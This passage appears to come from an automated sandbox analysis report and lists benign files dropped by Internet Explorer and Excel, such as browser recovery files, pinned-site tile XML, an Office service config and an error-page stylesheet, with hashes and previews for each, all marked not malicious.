                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7760345703977574
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwxGcprIGwpL8G/ap88clhGIpc8+FRGvnZpv8+FPGodqp98+FNGo4hpm8+2CGWne:rHZQZ+2ZljWPAtPyfP0hMPHcgOB
                                                                                                                                                                MD5:CD681ED6E3AB41F9B2BC5DD6D8FFF1EE
                                                                                                                                                                SHA1:3E384D392345F855F4744B727DA329BDEE4F5A01
                                                                                                                                                                SHA-256:93E4EDC208F1351F9BA4C9ADC6A25282744F23CA333270409F11A1B77E5CE594
                                                                                                                                                                SHA-512:FE70E480B75873D80E5CB03A8200419559AF7DE2E675637FE9512418D0BE0935F09B40CABE3ABBB370B34224365C0820A66011AC8B3589B057FD57357E4FB67F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99BBC3ED-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):27576
                                                                                                                                                                Entropy (8bit):1.9130107085336352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:rCZpQp6nBS/jp2xWmMGiUg3DTDp75ksg3DTDp7FCA:rCZpQp6nk/jp2xWmMGxYzp75lYzp7kA
                                                                                                                                                                MD5:A8EF5B0FD756BE9A78CFC806E96CE89C
                                                                                                                                                                SHA1:9296E6BB2974CE1A339E0AE36ED537F91A59D0EB
                                                                                                                                                                SHA-256:308836901656334D15ADA144BC333223C8AC95AA5C861BE928C961160EC83F77
                                                                                                                                                                SHA-512:45ED4601AC2859B1992EC7AF17ABCDB4370C62BEB17A21FD32FA9BEF0233DB593D1297E7CA25EFABEE74D6F2D80A1F47DE6A525A93582A88AAE73B992FBC581E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):27588
                                                                                                                                                                Entropy (8bit):1.914931709058199
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rSZTVQR63kDjd2FWlM5VLMPKV5BFVLMPKV5YsA:rO+s0PUcmHL8KVLL8KVWH
                                                                                                                                                                MD5:EC0378B9FD41FFC29F2D39AB7457E30B
                                                                                                                                                                SHA1:4699E57B1EEEC0AC8C39CFC52AF428F9379F9E6F
                                                                                                                                                                SHA-256:BFAF1575FBDA07B353E1A828C018FC9B5EE9A3F083B21222E653C97BB96B8111
                                                                                                                                                                SHA-512:30AE3D2843D90FBE25749603C668503A3530942D6BBAAA066D2232FC9130B49C7DF3A47F9B9BFB4BE5AF7BE25CE3D135E527EE8FB5173836169308C5DED63B0F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C1F50A29-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):28144
                                                                                                                                                                Entropy (8bit):1.9207168531889898
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rnZIQA6ak+jV2ZWJMlZ0cHXGT10c1cHX9A:rZxrz4MISHnHWJn6H+
                                                                                                                                                                MD5:54F420FC6D17AFC3213AC8178D548349
                                                                                                                                                                SHA1:D9931600D39445431E50841406AD061FC2649C44
                                                                                                                                                                SHA-256:429B50DBA0BF58729F62240F0A6F07980A4399B6AB4715DAD8E7D0DFA9BF448F
                                                                                                                                                                SHA-512:79D5F396F0B3A4AE0CCC48E3D47AF50D0E1FDF6980DFA1E8C532E86F878C9A0189055EA508318599D994FA7BB4EE9E3F6DB682D39CF8A6AB1D6858073B3F73F2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CFEFB1DE-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):27592
                                                                                                                                                                Entropy (8bit):1.918492100727991
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:ruZtQsA6WUBSTlbjh2USWYMQBc4UOolc4UOZA:ruZtQ16LkT1jh2ZWYMQBcROolcROZA
                                                                                                                                                                MD5:79D56166307B15993F3386A3A638376C
                                                                                                                                                                SHA1:A91AD9DAF8050BFFAFE18622F144902233ADFCA7
                                                                                                                                                                SHA-256:4A7A62EAF46954B9853038B0A7ACF3F68EF90704C589472AB9E41E7477286AF1
                                                                                                                                                                SHA-512:C9829231BEAEBE5C3A4B4529EE04D15EBE445BFB83F73829AD37C5EEA5F468397F1C7A9947ACCE9494B277FE57082A688E2028B08F86B949F28B00E46930B074
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.117856519163228
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxOEV3N3TnWimI002EtM3MHdNMNxOEV3N3TnWimI00ObVbkEtMb:2d6NxOU3N3TSZHKd6NxOU3N3TSZ76b
                                                                                                                                                                MD5:621EB656303E8270283EABFCF11F9854
                                                                                                                                                                SHA1:6526C70DE9143018456B6CA4EA35E4F0B8CA88E4
                                                                                                                                                                SHA-256:2920B7AC67CC5F1B544077642FABBC14C8D88CAD1BD0A90D623CC2A208A78500
                                                                                                                                                                SHA-512:8667901B40741E1CB1143A4F298437D50356DDB7A26EAFD255A95EF79FACC14569142544A3EA2EC613C23372F9A06632A146DA188DE96B0FEF95178C027A8892
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653
                                                                                                                                                                Entropy (8bit):5.106728622068366
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxe2kZnWimI002EtM3MHdNMNxe2kZnWimI00Obkak6EtMb:2d6NxroSZHKd6NxroSZ7Aa7b
                                                                                                                                                                MD5:D6A6DE7380D449E1E193FF1F7B3F8F9F
                                                                                                                                                                SHA1:28EC605B64FA91700DA2E8E2257AAE98465F5B93
                                                                                                                                                                SHA-256:3D41E628656CE87C4774567A257251E1322DC8CFF7DE8A0A140A62064F77F248
                                                                                                                                                                SHA-512:338E693D50BC2A8C7AACE28A54C5B0AF3D42B46E61657EEE73515D8911A44C0A2328AC171D2A176BA6073B04C65DE482BC8ABDF170B6D5764955FBCF0B4DB18C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6fb5d6c8,0x01d75eba</date><accdate>0x6fb5d6c8,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6fb5d6c8,0x01d75eba</date><accdate>0x6fb5d6c8,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):662
                                                                                                                                                                Entropy (8bit):5.136788640295428
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxvLV3N3TnWimI002EtM3MHdNMNxvLV3N3TnWimI00ObmZEtMb:2d6Nxvh3N3TSZHKd6Nxvh3N3TSZ7mb
                                                                                                                                                                MD5:4E4D5498C4A16D70F8920545C723D39D
                                                                                                                                                                SHA1:756FF5CD5B439C6E57A88C95FBD37FFB47355792
                                                                                                                                                                SHA-256:36132C63143D2A8EAC3A102D3856FB549FC7CB84E93135EED3BF4F7DAEE8FD1C
                                                                                                                                                                SHA-512:1C3C5C2485993969B33E5B446A1F054F2D62BF1A722C3D25D86C48A707A67E3F29D8F9F20B0DB5D4FE48188240259B098AB70A351A9C893D734BC7776D8A699C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):647
                                                                                                                                                                Entropy (8bit):5.065918622800244
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxia/mnWimI002EtM3MHdNMNxia/mnWimI00Obd5EtMb:2d6NxkSZHKd6NxkSZ7Jjb
                                                                                                                                                                MD5:6246BDE7DF4FCDA0BC7048B74C14155A
                                                                                                                                                                SHA1:68619801854D035811ECC95366232E86F88EC39E
                                                                                                                                                                SHA-256:963EF10FA72C3FD1FA97E84ACB35B2036F2D85831120F4CB0DD8FE0F35E3269C
                                                                                                                                                                SHA-512:4D2233773E3F2D8100CE87924E1F955D5241FE8201D70D8BBD3160D35B40D76D7EF1C4F0D5C860086CB40379CF755EBE2E4544F67E9413F1BB2D48A01A9EE629
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.1489570187121005
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxhGwV3N3TnWimI002EtM3MHdNMNxhGwV3N3TnWimI00Ob8K075EtMb:2d6NxQ43N3TSZHKd6NxQ43N3TSZ7YKa/
                                                                                                                                                                MD5:29E6A94B721E07C691157F21C9DDC9F4
                                                                                                                                                                SHA1:AAF5D22B8460AE65FAE6951CCE474BAAA78FD749
                                                                                                                                                                SHA-256:80270DA4EA34E2D6AAC9B78EFDFDB551E6293BE93399D57D8D14170D778CAC40
                                                                                                                                                                SHA-512:FD749B504705AD499681166CF3DABCC6A2D10BA22A23644D71A2DFA76151DE8DE0F1927F7D527D2F19CDD524A63B46DF9D62D983F9DDC311EC537EB44D152F92
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653
                                                                                                                                                                Entropy (8bit):5.049251456889828
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNx0na/mnWimI002EtM3MHdNMNx0na/mnWimI00ObxEtMb:2d6Nx0fSZHKd6Nx0fSZ7nb
                                                                                                                                                                MD5:AF79916588ECEB8DE2F37596B5CFD9AB
                                                                                                                                                                SHA1:1ED4FEC5493E4A9DA9C5D24EE37B9624279DCC9B
                                                                                                                                                                SHA-256:559328BE63BF10D7AF274EA7D37BC7A4C944431F4875F85289AD9ACFC9BDAA67
                                                                                                                                                                SHA-512:3C3505ADC49063B24B2DFAA73D5FF73491F0549C4C97CDB260A55EAAD0411DCE42B9584C864B9C49427C2D79CC9CCC50C938CF6AD265A0D31CA999158063F0EC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.09118941820664
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxxa/mnWimI002EtM3MHdNMNxxa/mnWimI00Ob6Kq5EtMb:2d6NxZSZHKd6NxZSZ7ob
                                                                                                                                                                MD5:7444DAD90865D1C0D12325E671E68B5B
                                                                                                                                                                SHA1:66017F5494B746FFB2AF7DBDC1A7E0740C24B910
                                                                                                                                                                SHA-256:0C9E37AEB53CA36742B577455DCABC2E7284C0C851C080C4091CD48C97E40847
                                                                                                                                                                SHA-512:C0F9E91597E6867C0BE986362EC2AED8F3DBA83125007B91C0096DBCC8E04843E98B37643A1CF34DFF7DBEC7F26EDCEDE4EEA65EDF8C9914F4C8337D09624274
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):659
                                                                                                                                                                Entropy (8bit):5.061859989595668
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxca/mnWimI002EtM3MHdNMNxca/mnWimI00ObVEtMb:2d6NxeSZHKd6NxeSZ7Db
                                                                                                                                                                MD5:8FEE54DFA3411F625D8ED1E88EC514B9
                                                                                                                                                                SHA1:E67044B5420D89F9A7066CB99DDDC02EAEB8C8EA
                                                                                                                                                                SHA-256:8D26BD1C0E10A05AC2DEFB0654DEC4823E77C5C9CC771A1D85C70BC71BDCCE28
                                                                                                                                                                SHA-512:9C67F8E18AF4E9CA8A4F8A18DE74ADC4B62663300BCDD95211128DECB38B9F41BB3CB7C3468DD517A3948E447CAFF6138231F470D246EF336C7A0E6F96C49388
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653
                                                                                                                                                                Entropy (8bit):5.0519975493291644
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxfna/mnWimI002EtM3MHdNMNxfna/mnWimI00Obe5EtMb:2d6NxHSZHKd6NxHSZ7ijb
                                                                                                                                                                MD5:128F29080C333A45A539BB3555A98792
                                                                                                                                                                SHA1:A6EEE2AF178F339D9985D675700BEA704B88E3C2
                                                                                                                                                                SHA-256:A0292B34ED728A07A85BD8E9E89453E4B21E2FEAC851E464E4B2198E60F26E7A
                                                                                                                                                                SHA-512:4746191CA63D7BDF4FB5C36C7416EDF4A89F648C40A5119F5F0954FF8455E33F74B97F77909CEB5DDAC903B6178775090A4419EA5C920930A94E6C149FB72E56
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D18DB67F-C32A-4E79-9062-0C1A4F78D8FB
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):134922
                                                                                                                                                                Entropy (8bit):5.369112384074001
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:9cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:pEQ9DQW+ziXOe
                                                                                                                                                                MD5:202418F344CB882FA00BA969D15999F0
                                                                                                                                                                SHA1:EA73964E25E6372D218265C44B6CBC7D80089119
                                                                                                                                                                SHA-256:869B61ACF54ECE951CDDD4378AF8E500E09BBD7DBAC458EBD1E5041F7F32D612
                                                                                                                                                                SHA-512:FFCE0AFACCCD2F8B5C0E71268BDE9E871241AE2EDC38863121F22EDFC6274885D8B1E33010BA323609E27483EADE93AE25EFC96485F0B0F5FEEAE3A229DB35F2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-11T03:06:37">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DFF046B8.png
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:PNG image data, 1038 x 657, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):82182
                                                                                                                                                                Entropy (8bit):7.937734438427685
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:BlthHGaFc1QdzhAVSrTINQzmxUF55taYxfvrnlljQ/9o3CNdaU3OLP:rRd9AY3yQzmq55HxfznllWA6dROLP
                                                                                                                                                                MD5:65F572544B616B7638EFC2A0DEE5EF2D
                                                                                                                                                                SHA1:26964C665C300FFAEF2D77CC455C305B014B149A
                                                                                                                                                                SHA-256:EFDE5EAA221B569C35140B384FC762AC48EA5EFE7F6EF8CF228448A8A6D18E4E
                                                                                                                                                                SHA-512:76B36C6BFF20B9E32471E8F6FD72E800C11DC0CDA47E3A59F3B792A1E5DBFC3CD5977AE9A3CE60E6AFEBAEAED1E82651C0FC513B98A62980744E709A3F008F2D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR..............>......sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^.........wYzQ...H.R.. ..hb'$.......b..Gc..5.a..(.."..T....]...>g..={..wn........S..;.s.d.E..........Z.+.........X.(.999.l.r.;w..5K.././..7.]...D../-Z...;.G.)....n....u.yS......UN....i.-2{.l.1c..7OV.Xa.!..{.n......),,...9.2jI..R.^=i....>r.a..A.....8"""""........X.p..9S..n.,Z.P.]+.7o..;w.@Aff..UK222.....h@a...25..<.L9..E..f<.....Qe...Q..=.t.R......o..9s.~2....4X..p....@.....<.@....~..DDDDDT.0p@.#??_._/.O...&.I_.5k.gu..)........j.m..y..a~........?.0..[.~a.......U.....Q$;v....+o.....?^6n.XR.W8l0.5..wA.Z.R.n].g.....4l...C...N.uKd.&yy..._P.H.....A....>..nC3.......2`...q..y.W.....u.L....A-...K...!.."..|P.}Gi......)..,`:.(.}....'.,XP.W...MP..I.j......~..yK!""""".x...E.0.4i.....2u.T...a..Z...w...-[..!.q...G....y.".'...LAa..\!//."..N..y...6m....k.N...*...y.$""""".x..P..G).....mY.p.dgg....@...:u.^.z..G.mj..i..<R.5...c.....o.....|..g.Y3....
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\ErrorPageTemplate[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
